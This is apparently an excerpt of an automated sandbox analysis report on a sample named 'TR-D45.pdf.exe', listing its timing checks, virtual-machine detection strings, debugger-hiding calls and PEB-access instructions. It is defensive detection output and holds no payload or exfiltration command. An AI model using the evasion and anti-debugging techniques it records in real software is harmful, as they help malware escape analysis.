      Source: C:\Users\user\Desktop\TR-D45.pdf.exeRDTSC instruction interceptor: First address: 00000000023980E8 second address: 00000000023980E8 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FF010BA1252h 0x0000001f popad 0x00000020 call 00007FF010BA0BCFh 0x00000025 lfence 0x00000028 rdtsc
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeRDTSC instruction interceptor: First address: 0000000002390F1B second address: 0000000002399812 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 push dword ptr [ebp+0000009Ch] 0x00000009 cmp bh, bh 0x0000000b push eax 0x0000000c jmp 00007FF010BA7C0Eh 0x0000000e cmp dh, ah 0x00000010 call 00007FF010BB03E8h 0x00000015 jmp 00007FF010BA7C12h 0x00000017 cmp ax, cx 0x0000001a call 00007FF010BA7BE5h 0x0000001f pop ebx 0x00000020 sub ebx, 05h 0x00000023 inc ebx 0x00000024 dec ebx 0x00000025 xor edx, edx 0x00000027 mov eax, ebx 0x00000029 mov ecx, 00000004h 0x0000002e div ecx 0x00000030 jmp 00007FF010BA7C0Eh 0x00000032 cmp dh, ah 0x00000034 cmp edx, 00000000h 0x00000037 jne 00007FF010BA7BA1h 0x00000039 movd mm3, ebx 0x0000003c jmp 00007FF010BA7C0Ah 0x0000003e pushad 0x0000003f mov edx, 00000023h 0x00000044 rdtsc
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeRDTSC instruction interceptor: First address: 00000000005680E8 second address: 00000000005680E8 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FF010BA1252h 0x0000001f popad 0x00000020 call 00007FF010BA0BCFh 0x00000025 lfence 0x00000028 rdtsc
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeRDTSC instruction interceptor: First address: 0000000000560F1B second address: 0000000000569812 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 push dword ptr [ebp+0000009Ch] 0x00000009 cmp bh, bh 0x0000000b push eax 0x0000000c jmp 00007FF010BA7C0Eh 0x0000000e cmp dh, ah 0x00000010 call 00007FF010BB03E8h 0x00000015 jmp 00007FF010BA7C12h 0x00000017 cmp ax, cx 0x0000001a call 00007FF010BA7BE5h 0x0000001f pop ebx 0x00000020 sub ebx, 05h 0x00000023 inc ebx 0x00000024 dec ebx 0x00000025 xor edx, edx 0x00000027 mov eax, ebx 0x00000029 mov ecx, 00000004h 0x0000002e div ecx 0x00000030 jmp 00007FF010BA7C0Eh 0x00000032 cmp dh, ah 0x00000034 cmp edx, 00000000h 0x00000037 jne 00007FF010BA7BA1h 0x00000039 movd mm3, ebx 0x0000003c jmp 00007FF010BA7C0Ah 0x0000003e pushad 0x0000003f mov edx, 00000023h 0x00000044 rdtsc
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 00000000024498E4 second address: 00000000024498EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 0000000002449B5E second address: 0000000002449B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02399799 rdtsc 0_2_02399799
      Source: C:\Users\user\Desktop\TR-D45.pdf.exe TID: 6656Thread sleep count: 192 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 4860Thread sleep time: -54000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\control.exe TID: 6664Thread sleep time: -50000s >= -30000sJump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: explorer.exe, 00000005.00000002.507545804.00000000053C4000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllsers\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db@
      Source: explorer.exe, 00000005.00000000.296937352.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
      Source: explorer.exe, 00000005.00000000.281354355.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000005.00000000.296192370.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: explorer.exe, 00000005.00000000.281932971.000000000375B000.00000004.00000001.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
      Source: explorer.exe, 00000005.00000000.282007162.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
      Source: explorer.exe, 00000005.00000000.281932971.000000000375B000.00000004.00000001.sdmpBinary or memory string: AASCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
      Source: TR-D45.pdf.exe, 00000001.00000003.270393994.00000000008C5000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000005.00000002.495706634.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
      Source: explorer.exe, 00000005.00000000.297301925.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
      Source: explorer.exe, 00000005.00000002.507545804.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
      Source: explorer.exe, 00000005.00000000.296192370.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: TR-D45.pdf.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 00000005.00000000.296192370.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: explorer.exe, 00000005.00000000.297301925.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
      Source: TR-D45.pdf.exe, 00000001.00000002.314208350.0000000000887000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW@%
      Source: explorer.exe, 00000005.00000000.296192370.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging:

      barindex
      Contains functionality to hide a thread from the debuggerShow sources
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_0239071B NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,000000000_2_0239071B
      Hides threads from debuggersShow sources
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02399799 rdtsc 0_2_02399799
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02395737 LdrInitializeThunk,0_2_02395737
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_023989D5 mov eax, dword ptr fs:[00000030h]0_2_023989D5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02392372 mov eax, dword ptr fs:[00000030h]0_2_02392372
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_023941DF mov eax, dword ptr fs:[00000030h]0_2_023941DF
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02398A59 mov eax, dword ptr fs:[00000030h]0_2_02398A59
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02398A97 mov eax, dword ptr fs:[00000030h]0_2_02398A97
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02398B37 mov eax, dword ptr fs:[00000030h]0_2_02398B37
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02398B03 mov eax, dword ptr fs:[00000030h]0_2_02398B03
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02392B41 mov eax, dword ptr fs:[00000030h]0_2_02392B41
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02397BBE mov eax, dword ptr fs:[00000030h]0_2_02397BBE
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_023989FF mov eax, dword ptr fs:[00000030h]0_2_023989FF
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02392F3B mov eax, dword ptr fs:[00000030h]0_2_02392F3B
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02392F0A mov eax, dword ptr fs:[00000030h]0_2_02392F0A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02392F8B mov eax, dword ptr fs:[00000030h]0_2_02392F8B
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02396D27 mov eax, dword ptr fs:[00000030h]0_2_02396D27
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02396D4F mov eax, dword ptr fs:[00000030h]0_2_02396D4F
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E26E620 mov eax, dword ptr fs:[00000030h]1_2_1E26E620
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E31FE3F mov eax, dword ptr fs:[00000030h]1_2_1E31FE3F
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E26C600 mov eax, dword ptr fs:[00000030h]1_2_1E26C600
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E26C600 mov eax, dword ptr fs:[00000030h]1_2_1E26C600
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E26C600 mov eax, dword ptr fs:[00000030h]1_2_1E26C600
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E298E00 mov eax, dword ptr fs:[00000030h]1_2_1E298E00
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E29A61C mov eax, dword ptr fs:[00000030h]1_2_1E29A61C
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E29A61C mov eax, dword ptr fs:[00000030h]1_2_1E29A61C
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E321608 mov eax, dword ptr fs:[00000030h]1_2_1E321608
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E27766D mov eax, dword ptr fs:[00000030h]1_2_1E27766D
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E28AE73 mov eax, dword ptr fs:[00000030h]1_2_1E28AE73
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E28AE73 mov eax, dword ptr fs:[00000030h]1_2_1E28AE73
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E28AE73 mov eax, dword ptr fs:[00000030h]1_2_1E28AE73
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E28AE73 mov eax, dword ptr fs:[00000030h]1_2_1E28AE73
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E28AE73 mov eax, dword ptr fs:[00000030h]1_2_1E28AE73
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E277E41 mov eax, dword ptr fs:[00000030h]1_2_1E277E41
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E277E41 mov eax, dword ptr fs:[00000030h]1_2_1E277E41
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E277E41 mov eax, dword ptr fs:[00000030h]1_2_1E277E41
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E277E41 mov eax, dword ptr fs:[00000030h]1_2_1E277E41
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E277E41 mov eax, dword ptr fs:[00000030h]1_2_1E277E41
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E277E41 mov eax, dword ptr fs:[00000030h]1_2_1E277E41
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E32AE44 mov eax, dword ptr fs:[00000030h]1_2_1E32AE44
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E32AE44 mov eax, dword ptr fs:[00000030h]1_2_1E32AE44
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E46A7 mov eax, dword ptr fs:[00000030h]1_2_1E2E46A7
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E330EA5 mov eax, dword ptr fs:[00000030h]1_2_1E330EA5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E330EA5 mov eax, dword ptr fs:[00000030h]1_2_1E330EA5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E330EA5 mov eax, dword ptr fs:[00000030h]1_2_1E330EA5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2FFE87 mov eax, dword ptr fs:[00000030h]1_2_1E2FFE87
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2776E2 mov eax, dword ptr fs:[00000030h]1_2_1E2776E2
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2916E0 mov ecx, dword ptr fs:[00000030h]1_2_1E2916E0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E338ED6 mov eax, dword ptr fs:[00000030h]1_2_1E338ED6
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2936CC mov eax, dword ptr fs:[00000030h]1_2_1E2936CC
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A8EC7 mov eax, dword ptr fs:[00000030h]1_2_1E2A8EC7
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E31FEC0 mov eax, dword ptr fs:[00000030h]1_2_1E31FEC0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E264F2E mov eax, dword ptr fs:[00000030h]1_2_1E264F2E
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E264F2E mov eax, dword ptr fs:[00000030h]1_2_1E264F2E
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E29E730 mov eax, dword ptr fs:[00000030h]1_2_1E29E730
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E29A70E mov eax, dword ptr fs:[00000030h]1_2_1E29A70E
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E29A70E mov eax, dword ptr fs:[00000030h]1_2_1E29A70E
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E33070D mov eax, dword ptr fs:[00000030h]1_2_1E33070D
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E33070D mov eax, dword ptr fs:[00000030h]1_2_1E33070D
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E28F716 mov eax, dword ptr fs:[00000030h]1_2_1E28F716
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2FFF10 mov eax, dword ptr fs:[00000030h]1_2_1E2FFF10
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2FFF10 mov eax, dword ptr fs:[00000030h]1_2_1E2FFF10
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E27FF60 mov eax, dword ptr fs:[00000030h]1_2_1E27FF60
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E338F6A mov eax, dword ptr fs:[00000030h]1_2_1E338F6A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E27EF40 mov eax, dword ptr fs:[00000030h]1_2_1E27EF40
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E278794 mov eax, dword ptr fs:[00000030h]1_2_1E278794
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E7794 mov eax, dword ptr fs:[00000030h]1_2_1E2E7794
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E7794 mov eax, dword ptr fs:[00000030h]1_2_1E2E7794
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E7794 mov eax, dword ptr fs:[00000030h]1_2_1E2E7794
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A37F5 mov eax, dword ptr fs:[00000030h]1_2_1E2A37F5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E29BC2C mov eax, dword ptr fs:[00000030h]1_2_1E29BC2C
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E6C0A mov eax, dword ptr fs:[00000030h]1_2_1E2E6C0A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E6C0A mov eax, dword ptr fs:[00000030h]1_2_1E2E6C0A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E6C0A mov eax, dword ptr fs:[00000030h]1_2_1E2E6C0A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E6C0A mov eax, dword ptr fs:[00000030h]1_2_1E2E6C0A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h]1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h]1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h]1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h]1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h]1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h]1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h]1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h]1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h]1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h]1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h]1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h]1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h]1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E321C06 mov eax, dword ptr fs:[00000030h]1_2_1E321C06
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E33740D mov eax, dword ptr fs:[00000030h]1_2_1E33740D
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E33740D mov eax, dword ptr fs:[00000030h]1_2_1E33740D
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E33740D mov eax, dword ptr fs:[00000030h]1_2_1E33740D
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E28746D mov eax, dword ptr fs:[00000030h]1_2_1E28746D
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E29A44B mov eax, dword ptr fs:[00000030h]1_2_1E29A44B
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2FC450 mov eax, dword ptr fs:[00000030h]1_2_1E2FC450
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2FC450 mov eax, dword ptr fs:[00000030h]1_2_1E2FC450
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E27849B mov eax, dword ptr fs:[00000030h]1_2_1E27849B
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E3214FB mov eax, dword ptr fs:[00000030h]1_2_1E3214FB
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E6CF0 mov eax, dword ptr fs:[00000030h]1_2_1E2E6CF0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E6CF0 mov eax, dword ptr fs:[00000030h]1_2_1E2E6CF0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E6CF0 mov eax, dword ptr fs:[00000030h]1_2_1E2E6CF0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E338CD6 mov eax, dword ptr fs:[00000030h]1_2_1E338CD6
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E338D34 mov eax, dword ptr fs:[00000030h]1_2_1E338D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E32E539 mov eax, dword ptr fs:[00000030h]1_2_1E32E539
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E294D3B mov eax, dword ptr fs:[00000030h]1_2_1E294D3B
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E294D3B mov eax, dword ptr fs:[00000030h]1_2_1E294D3B
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E294D3B mov eax, dword ptr fs:[00000030h]1_2_1E294D3B
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h]1_2_1E273D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h]1_2_1E273D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h]1_2_1E273D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h]1_2_1E273D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h]1_2_1E273D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h]1_2_1E273D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h]1_2_1E273D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h]1_2_1E273D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h]1_2_1E273D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h]1_2_1E273D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h]1_2_1E273D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h]1_2_1E273D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E273D34 mov eax, dword ptr fs:[00000030h]1_2_1E273D34
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E26AD30 mov eax, dword ptr fs:[00000030h]1_2_1E26AD30
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2EA537 mov eax, dword ptr fs:[00000030h]1_2_1E2EA537
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E28C577 mov eax, dword ptr fs:[00000030h]1_2_1E28C577
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E28C577 mov eax, dword ptr fs:[00000030h]1_2_1E28C577
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A3D43 mov eax, dword ptr fs:[00000030h]1_2_1E2A3D43
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E3540 mov eax, dword ptr fs:[00000030h]1_2_1E2E3540
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E313D40 mov eax, dword ptr fs:[00000030h]1_2_1E313D40
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E287D50 mov eax, dword ptr fs:[00000030h]1_2_1E287D50
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2935A1 mov eax, dword ptr fs:[00000030h]1_2_1E2935A1
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E291DB5 mov eax, dword ptr fs:[00000030h]1_2_1E291DB5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E291DB5 mov eax, dword ptr fs:[00000030h]1_2_1E291DB5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E291DB5 mov eax, dword ptr fs:[00000030h]1_2_1E291DB5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E3305AC mov eax, dword ptr fs:[00000030h]1_2_1E3305AC
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E3305AC mov eax, dword ptr fs:[00000030h]1_2_1E3305AC
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E292581 mov eax, dword ptr fs:[00000030h]1_2_1E292581
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E292581 mov eax, dword ptr fs:[00000030h]1_2_1E292581
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E292581 mov eax, dword ptr fs:[00000030h]1_2_1E292581
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E292581 mov eax, dword ptr fs:[00000030h]1_2_1E292581
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E262D8A mov eax, dword ptr fs:[00000030h]1_2_1E262D8A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E262D8A mov eax, dword ptr fs:[00000030h]1_2_1E262D8A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E262D8A mov eax, dword ptr fs:[00000030h]1_2_1E262D8A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E262D8A mov eax, dword ptr fs:[00000030h]1_2_1E262D8A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E262D8A mov eax, dword ptr fs:[00000030h]1_2_1E262D8A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E29FD9B mov eax, dword ptr fs:[00000030h]1_2_1E29FD9B
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E29FD9B mov eax, dword ptr fs:[00000030h]1_2_1E29FD9B
